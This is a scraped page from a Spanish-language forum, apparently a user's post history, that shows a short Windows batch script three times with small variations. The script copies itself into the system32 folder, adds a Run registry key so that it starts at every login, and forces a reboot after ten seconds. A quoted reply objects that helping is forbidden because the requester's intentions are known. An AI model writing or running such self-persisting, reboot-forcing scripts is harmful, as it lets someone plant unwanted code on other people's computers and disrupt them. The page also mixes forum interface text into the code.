Código (bash) [Seleccionar]
echo off
copy %0 %windir%/system32/
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "Win" /t REG_SZ /d "c:\%windir%\system32\script.bat" /f > nul
shutdown -r -t 10
exit
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menúecho off
copy %0 %windir%/system32/
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "Win" /t REG_SZ /d "c:\%windir%\system32\script.bat" /f > nul
shutdown -r -t 10
exit
Cita de: Di~OsK en 12 Junio 2011, 20:27 PM
@.:UND3R:.
Muy lindo tu código, pero deberías saber que esta prohibido ayudar en casos como este =/ ya que se sabe cuales son las intenciones de @guribe
echo off
copy %0 %windir%/system32/
reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "System" /t REG_SZ /d "%windir/system32/script.bat" /f > nul
shutdown -r -t 10
exit